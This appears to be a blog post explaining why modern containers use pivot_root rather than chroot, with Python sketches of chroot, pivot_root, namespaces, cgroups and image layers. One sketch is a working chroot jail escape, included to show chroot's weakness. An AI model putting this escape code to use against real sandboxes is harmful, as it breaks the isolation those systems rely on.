November 10, 2022

Modern containers don't use chroot (updated)

A tiny explanation of how containers work. Updated November 11, 2022.

What is chroot?

chroot is a Linux syscall that changes the root directory of a process. It is widely believed that containers are implemented using chroot. This is wrong, but it does make sense. If you run ls inside a container, you only see files from that container. chroot is more than capable of making that happen.
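To make the ls observation concrete, here is a minimal sketch in Python, assuming a Linux machine. The function name ls_root_inside_chroot is made up for illustration. It forks a child, chroots the child into a directory, and reports what the child sees at "/". chroot needs the CAP_SYS_CHROOT capability (normally root), so the sketch returns None when the call is refused.

```python
import os


def ls_root_inside_chroot(new_root):
    """Return what a chrooted child process sees when it lists "/".

    Returns None if the child is not allowed to call chroot.
    """
    read_fd, write_fd = os.pipe()
    pid = os.fork()
    if pid == 0:  # child: change root, look around, report back
        os.close(read_fd)
        try:
            os.chroot(new_root)  # "/" now resolves to new_root for this process
            os.chdir("/")        # move the working directory inside the new root
            listing = "\n".join(sorted(os.listdir("/")))
            os.write(write_fd, b"ok\n" + listing.encode())
        except PermissionError:
            os.write(write_fd, b"denied\n")
        finally:
            os._exit(0)          # never fall through into the parent's code
    # parent: collect the child's report
    os.close(write_fd)
    with os.fdopen(read_fd, "rb") as pipe:
        report = pipe.read().decode()
    os.waitpid(pid, 0)
    status, _, listing = report.partition("\n")
    if status != "ok":
        return None
    return listing.split("\n") if listing else []
```

Run as root against a directory that holds a single file, the child should report only that file, even though the host's real "/" is full of other things.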

I too used to think that containers use chroot.

But now I know better.

What does the source code say?

If containers were implemented with chroot, you'd expect container runtimes to call chroot in their source code.

So I searched runc's code for chroot.

Hmm, it does appear there after all. Sixth line from the top:

But a closer look reveals that chroot isn't usually called! The highlighted code runs instead. (Normally configs.NEWNS is true.)
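The branch described above boils down to something like the following. This is a Python paraphrase, not runc's actual Go code: Config, choose_root_switch, and the NEWNS string are made-up stand-ins for illustration, and runc's real function handles more cases than these two.

```python
from dataclasses import dataclass, field

# Stand-in for runc's configs.NEWNS, the flag for a new mount namespace.
NEWNS = "NEWNS"


@dataclass
class Config:
    """Hypothetical, stripped-down container config."""
    # Containers normally get their own mount namespace.
    namespaces: set = field(default_factory=lambda: {NEWNS})


def choose_root_switch(config):
    """Name the mechanism used to change the container's root directory."""
    if NEWNS in config.namespaces:
        return "pivotRoot"  # the usual path
    return "chroot"         # fallback when there is no mount namespace
```

With the default config, choose_root_switch(Config()) picks "pivotRoot". Only a config without a mount namespace falls back to "chroot".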

What is in that highlighted code? A mysterious function called pivotRoot.

pivot_root vs chroot

pivotRoot is a wrapper for the Linux syscall pivot_root. What is pivot_root then? Basically, chroot++.

But what's wrong with chroot? For starters, it's trivial for a rogue process running as root to undo a chroot. It just needs to call chroot again and reverse the first call. Whoops. Isolation broken.
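The well-known escape can be sketched like this in Python, assuming Linux and a process that still holds root inside the jail. The function name and the "hatch" directory are made up for illustration. The trick: a second chroot into a subdirectory moves the root down but leaves the working directory above it, so ".." is no longer stopped at the root.

```python
import os


def chroot_escape_succeeds(jail, marker):
    """Jail a child with chroot, attempt the classic escape, report the result.

    marker is an absolute host path outside the jail. Returns True if the
    child can see it after escaping, False if it cannot, and None if the
    child was not allowed to chroot in the first place.
    """
    pid = os.fork()
    if pid == 0:  # child
        code = 2  # 2 means "could not even try"
        try:
            os.chroot(jail)        # first call: the jail is now "/"
            os.chdir("/")
            os.makedirs("hatch", exist_ok=True)
            os.chroot("hatch")     # second call: root moves down, cwd stays put
            for _ in range(128):
                os.chdir("..")     # cwd is outside the root, so ".." keeps climbing
            os.chroot(".")         # make the real top of the tree the root again
            code = 0 if os.path.exists(marker) else 1
        except PermissionError:
            code = 2
        finally:
            os._exit(code)
    _, status = os.waitpid(pid, 0)
    return {0: True, 1: False}.get(os.WEXITSTATUS(status))
```

Everything happens in a forked child, so the calling process keeps its own root directory.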

There are actually workarounds for that, which still use chroot, but as the man page says, chroot "is not intended to be used for any kind of security purpose."

pivot_root, on the other hand, is designed for that.

With pivot_root you can jail a set of processes inside a directory properly. And that's a must for containers.
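For comparison, here is a rough Python sketch of a pivot_root jail. It follows the sequence shown in the pivot_root(2) man page example rather than runc's exact steps. It assumes Linux on x86_64 or aarch64 (the syscall numbers are hard-coded for those two) and needs CAP_SYS_ADMIN. The helper names are made up, and any failure is reported as None.

```python
import ctypes
import os
import platform

# Values copied from the Linux headers <sched.h> and <sys/mount.h>.
CLONE_NEWNS = 0x00020000
MS_BIND, MS_REC, MS_PRIVATE = 4096, 16384, 1 << 18
MNT_DETACH = 2
# glibc ships no pivot_root() wrapper, so the raw syscall number is needed.
SYS_PIVOT_ROOT = {"x86_64": 155, "aarch64": 41}


def _check(ret):
    """Turn a non-zero return from libc into an OSError."""
    if ret != 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))


def jail_with_pivot_root(new_root):
    """Swap the calling process's root mount for new_root (absolute path)."""
    libc = ctypes.CDLL(None, use_errno=True)
    libc.mount.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p,
                           ctypes.c_ulong, ctypes.c_void_p]
    nr = ctypes.c_long(SYS_PIVOT_ROOT[platform.machine()])
    new = os.fsencode(new_root)
    old = os.fsencode(os.path.join(new_root, "oldroot"))
    _check(libc.unshare(CLONE_NEWNS))  # get a private copy of the mount table
    _check(libc.mount(None, b"/", None, MS_REC | MS_PRIVATE, None))  # stop propagation to the host
    _check(libc.mount(new, new, None, MS_BIND, None))  # new_root must be a mount point
    os.makedirs(old, exist_ok=True)
    _check(libc.syscall(nr, new, old))  # new_root becomes "/", old root lands in /oldroot
    os.chdir("/")
    _check(libc.umount2(b"/oldroot", MNT_DETACH))  # drop the old root from this namespace
    os.rmdir("/oldroot")


def ls_root_after_pivot(new_root):
    """List "/" from a child jailed with pivot_root; None if the jail failed."""
    read_fd, write_fd = os.pipe()
    pid = os.fork()
    if pid == 0:  # child
        os.close(read_fd)
        try:
            jail_with_pivot_root(new_root)
            listing = "\n".join(sorted(os.listdir("/")))
            os.write(write_fd, b"ok\n" + listing.encode())
        except (OSError, KeyError):
            os.write(write_fd, b"failed\n")
        finally:
            os._exit(0)
    os.close(write_fd)
    with os.fdopen(read_fd, "rb") as pipe:
        report = pipe.read().decode()
    os.waitpid(pid, 0)
    status, _, listing = report.partition("\n")
    if status != "ok":
        return None
    return listing.split("\n") if listing else []
```

The difference from chroot is in the last two steps of jail_with_pivot_root: once the old root is unmounted, nothing is left in the process's mount namespace to climb back into.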

For a deep dive on chroot vs pivot_root, see this post from tbhaxor.

What are containers, really?

A container at runtime is:

  1. Linux namespaces to isolate resources. (pivot_root works on mount namespaces. Containers also use network namespaces, PID namespaces, and more.)
  2. cgroups to limit resource usage or distribute it fairly between containers. (This is what CPU limits and requests get translated to. But remember, your Kubernetes needs no limits!)
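Both pieces can be poked at from Python. The sketch below lists the namespaces a process belongs to by reading /proc, then shows one plausible translation of CPU limits and requests into cgroup values. The constants (a 100 ms period, 1024 shares per core, floors of 1000 and 2, a cap of 262144) are assumptions modelled on how kubelet is commonly described as doing this for cgroup v1, so verify them before relying on them. All function names are made up for illustration.

```python
import os


def namespaces_of(pid="self"):
    """Map namespace type to its identifier, e.g. "mnt" -> "mnt:[...]"."""
    ns_dir = f"/proc/{pid}/ns"
    return {name: os.readlink(os.path.join(ns_dir, name))
            for name in sorted(os.listdir(ns_dir))}


def cpu_limit_to_cfs_quota(millicores, period_us=100_000):
    """CPU limit in millicores -> CFS quota in microseconds per period.

    Returns None for a limit of 0, which is treated here as "no limit".
    """
    if millicores == 0:
        return None
    # Assumed floor of 1000 microseconds so tiny limits still get some CPU.
    return max(millicores * period_us // 1000, 1000)


def cpu_request_to_shares(millicores):
    """CPU request in millicores -> cgroup v1 cpu.shares (relative weight)."""
    # Assumed bounds: at least 2 shares, at most 262144.
    return min(max(millicores * 1024 // 1000, 2), 262144)
```

Under these assumptions a limit of 500m becomes a quota of 50000 microseconds per 100000 microsecond period (half a core), and a request of 250m becomes 256 shares. Two processes are in the same mount namespace when namespaces_of returns the same "mnt" value for both.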

Matt Rickard recently covered cgroups and namespaces. Earthly did a deep dive on filesystem isolation, although they made the very mistake this post is about. I've talked about chroot on LinkedIn too.

What are containers... at build-time?

Surprisingly, to build a container you must run a container! At least traditionally. More on that in a future post.

What are containers... when they're inside a registry?

Compressed and layered filesystems with some metadata.

I think. Haven't dealt with that area much.
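A toy illustration of "compressed and layered filesystems with some metadata", assuming the OCI image layout, where each layer is a gzip-compressed tar archive and a JSON manifest lists the layers by digest and size. Everything here is built in memory. The file contents are invented, and real images also use whiteout files to delete paths, which this sketch ignores.

```python
import hashlib
import io
import tarfile


def make_layer(files):
    """Pack {path: bytes} into a gzip-compressed tar blob, like one layer."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def descriptor(media_type, blob):
    """Metadata pointing at a blob: its type, content digest, and size."""
    return {
        "mediaType": media_type,
        "digest": "sha256:" + hashlib.sha256(blob).hexdigest(),
        "size": len(blob),
    }


def build_manifest(config_blob, layer_blobs):
    """Assemble a manifest dict that references the config and each layer."""
    return {
        "schemaVersion": 2,
        "mediaType": "application/vnd.oci.image.manifest.v1+json",
        "config": descriptor("application/vnd.oci.image.config.v1+json", config_blob),
        "layers": [descriptor("application/vnd.oci.image.layer.v1.tar+gzip", blob)
                   for blob in layer_blobs],
    }


def flatten(layer_blobs):
    """Apply layers in order; files in later layers overwrite earlier ones."""
    rootfs = {}
    for blob in layer_blobs:
        with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
            for member in tar.getmembers():
                if member.isfile():
                    rootfs[member.name] = tar.extractfile(member).read()
    return rootfs
```

For example, flattening a base layer that contains bin/app followed by a second layer that ships a newer bin/app yields the newer file, which is the layering idea in miniature.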

Questions? Comments?

Yes, please. I'm on LinkedIn and Twitter.

Also, Robusta.dev just got a major update. If you're tired of noisy and unclear Kubernetes alerts, check it out. Best for people who like Prometheus.
